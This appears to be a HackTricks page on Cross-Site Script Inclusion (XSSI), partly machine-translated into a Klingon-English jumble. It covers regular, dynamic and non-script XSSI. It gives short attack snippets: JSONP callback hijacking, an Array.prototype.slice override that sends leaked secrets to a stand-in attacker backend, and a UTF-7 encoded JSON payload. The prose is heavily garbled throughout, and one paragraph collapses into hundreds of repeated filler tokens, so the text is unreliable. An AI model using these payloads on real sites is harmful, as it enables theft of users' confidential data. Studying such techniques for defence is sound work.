XSSI (Cross-Site Script Inclusion)

htARTE (HackTricks AWS Red Team Expert) !HackTricks! 'oH

HackTricks vItlhutlh:

HackTricks 'oH tlhIngan Hol vItlhutlh 'ej HackTricks 'oH PDF vItlhutlh SUBSCRIPTION PLANS vItlhutlh!
PEASS & HackTricks swag vItlhutlh
The PEASS Family vItlhutlh, NFTs opensea.io vItlhutlh
💬 Discord group 'ej telegram group vItlhutlh 'ej Twitter 🐦 @carlospolopm.
HackTricks 'ej HackTricks Cloud github repos vItlhutlh PRs jImej.

Basic Information

Cross-Site Script Inclusion (XSSI) 'oH vulnerability 'e' vItlhutlh script tag HTML. 'ach resources, 'oH Same-Origin Policy (SOP), 'ach, scripts vItlhutlh included different domains. vItlhutlh 'oH behavior intended libraries 'ej resources hosted different servers 'ach introduces potential security risk.

Key Characteristics of XSSI:

Bypass of SOP: Scripts vItlhutlh exempt Same-Origin Policy, allowing vItlhutlh included across domains.
Data Exposure: 'ach attacker vItlhutlh exploit behavior read data loaded script tag.
Impact on Dynamic JavaScript/JSONP: XSSI 'oH particularly relevant dynamic JavaScript 'ej JSON with Padding (JSONP). 'ach technologies often use "ambient-authority" information (like cookies) authentication. script request vItlhutlh made different host, credentials (e.g., cookies) automatically included request.
Authentication Token Leakage: 'ach attacker vItlhutlh trick user's browser requesting script server they control, vItlhutlh access sensitive information contained requests.

Types

Static JavaScript - 'oH represents conventional form XSSI.
Static JavaScript with Authentication - 'oH type distinct because authentication vItlhutlh access.
Dynamic JavaScript - Involves JavaScript dynamically generates content.
Non-JavaScript - Refers vulnerabilities involve JavaScript directly.

The following information sumary https://www.scip.ch/en/?labs.20160414. vItlhutlh further details.

Regular XSSI

In this approach, private information embedded within globally accessible JavaScript file. Attackers vItlhutlh identify files using methods file reading, keyword searches, regular expressions. Once located, script containing private information vItlhutlh included malicious content, allowing unauthorized access sensitive data. example exploitation technique shown below:

<script src="https://www.vulnerable-domain.tld/script.js"></script>
<script> alert(JSON.stringify(confidential_keys[0])); </script>

Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI

tlhIngan Hol translation:

Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI 'ej XSSI attacks vItlhutlh confidential information 'e' dynamically added script response user's request. Detection vItlhutlh performed sending requests cookies 'ej comparing responses. 'ach information Doch Doch indicate presence confidential information. vaj process vItlhutlh automated tools DetectDynamicJS Burp extension.

confidential data vItlhutlh stored global variable, exploited methods Regular XSSI vItlhutlh used. 'ach confidential data vItlhutlh included JSONP response, attackers hijack callback function retrieve information. vaj vItlhutlh manipulating global objects setting function executed JSONP response, demonstrated below:

<script>
var angular = function () { return 1; };
angular.callbacks = function () { return 1; };
angular.callbacks._7 = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://site.tld/p?jsonp=angular.callbacks._7" type="text/javascript"></script>

<script>
leak = function (leaked) {
alert(JSON.stringify(leaked));
};
</script>
<script src="https://site.tld/p?jsonp=leak" type="text/javascript"></script>

XSSI (Cross-Site Script Inclusion)

For variables not residing in the global namespace, prototype tampering can sometimes be exploited. This technique leverages JavaScript's design, where code interpretation involves traversing the prototype chain to locate the called property. By overriding certain functions, such as Array's slice, attackers can access and leak non-global variables:

XSSI (Cross-Site Script Inclusion)

ghItlhvamDaq prototype tampering vItlhutlh. vaj JavaScript vItlhutlh, 'ej vItlhutlhDaq code interpretation involves the prototype chain to locate the called property. 'ej 'ejwI'vam 'ejwI'vam, 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejwI'vam 'ejw

Array.prototype.slice = function(){
// leaks ["secret1", "secret2", "secret3"]
sendToAttackerBackend(this);
};

Non-Script-XSSI

Takeshi Terada's research introduces another form of XSSI, where Non-Script files, such as CSV, are leaked cross-origin by being included as sources in a script tag. Historical instances of XSSI, such as Jeremiah Grossman’s 2006 attack to read a complete Google address book and Joe Walker’s 2007 JSON data leak, highlight the severity of these threats. Additionally, Gareth Heyes describes an attack variant involving UTF-7 encoded JSON to escape the JSON format and execute scripts, effective in certain browsers:

Non-Script-XSSI

[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]

<script src="http://site.tld/json-utf7.json" type="text/javascript" charset="UTF-7"></script>

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

13 KiB Raw Permalink Blame History Unescape Escape

XSSI (Cross-Site Script Inclusion)

Basic Information

Key Characteristics of XSSI:

Types

Regular XSSI

Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI

XSSI (Cross-Site Script Inclusion)

XSSI (Cross-Site Script Inclusion)

Non-Script-XSSI

Non-Script-XSSI

13 KiB

Raw Permalink Blame History